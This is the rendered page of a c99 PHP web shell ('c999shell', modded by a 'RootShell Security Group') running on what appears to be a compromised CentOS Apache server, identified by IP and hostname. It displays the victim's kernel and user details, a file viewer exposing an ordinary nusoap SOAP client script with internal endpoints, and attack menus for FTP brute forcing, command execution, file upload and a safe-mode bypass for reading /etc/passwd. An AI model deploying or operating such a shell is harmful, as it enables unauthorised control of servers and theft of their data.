110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/nusoap/ drwxr-xr-x Free 52.65 GB of 127.8 GB (41.2%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/nusoap/ drwxr-xr-x
Free 52.65 GB of 127.8 GB (41.2%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: client.php (2.36 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?

	require_once('lib/nusoap/nusoap.php');

	//$client = new soapclient("http://118.175.19.15/mis/centralize/admin/response.php");

	//$result = $client->call('SubmitUpdate',array('collegeID'=>'03'));

	//$result = $client->call('getUpdateInfo',array('queryID'=>'1'));

	//print_r($tmp);

	$client = new soapclient('http://202.29.105.1/emanage/nusoap/server.php');
	//$client = new soapclient('http://202.29.105.1/emanage/nusoap/server.php');
	
	//$result = $client->call('getResearchTB',array('researchCode'=>'2'));
	//$result = $client->call('test');
	
	$result = $client->call('getResearchID',array('tableName'=>'research_tb'));
	//$result = $client->call('getResearchID',array('tableName'=>'research_char_tb'));
	//$result = $client->call('getResearchID',array('tableName'=>'research_file_tb'));
	//$result = $client->call('getResearchID',array('tableName'=>'research_public_tb'));
	//$result = $client->call('getResearchID',array('tableName'=>'research_success_tb'));
	
	//$result = $client->call('getResearchCharTB',array('researchCode'=>'1'));
	//$result = $client->call('getResearchCharTB',array('researchCode'=>'1'));
		
?>

<meta http-equiv="Content-Type" content="text/html; charset=tis-620">

<?
	//$msg = "";

	//for($i=0;$i<sizeof($result);$i++){
		//echo base64_decode($result[0])." ,".base64_decode($result[1])." ,".base64_decode($result[2])." ,".base64_decode($result[3])." ,".base64_decode($result[4])." ,".base64_decode($result[5])." ,".base64_decode($result[6])." ,".base64_decode($result[7])." ,".base64_decode($result[8]);
		//$msg = $msg.base64_decode($result[$i]).",";
	//}

	//echo $msg;

	$data = split(',',$result);
	//print_r($data);
	//echo sizeof($data);
	//echo $result;
	//echo $data;	

	for($i=0;$i<sizeof($data);$i++){
		$result = $client->call('getResearchTB',array('researchCode'=>$data[$i]));
		//$result = $client->call('getResearchCharTB',array('researchCode'=>$data[$i]));
		//$result = $client->call('getResearchFileTB',array('researchCode'=>$data[$i]));
		//$result = $client->call('getResearchPublicTB',array('researchCode'=>$data[$i]));
		//$result = $client->call('getResearchSuccessTB',array('researchCode'=>$data[$i]));
				
		$msg = "";
		for($n=0;$n<sizeof($result);$n++){		
			$msg = $n == 0 ? base64_decode($result[$n]) : $msg.",".base64_decode($result[$n]);
		}
		$msg .= "<br>";

		echo $msg;
	}

?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0062 ]--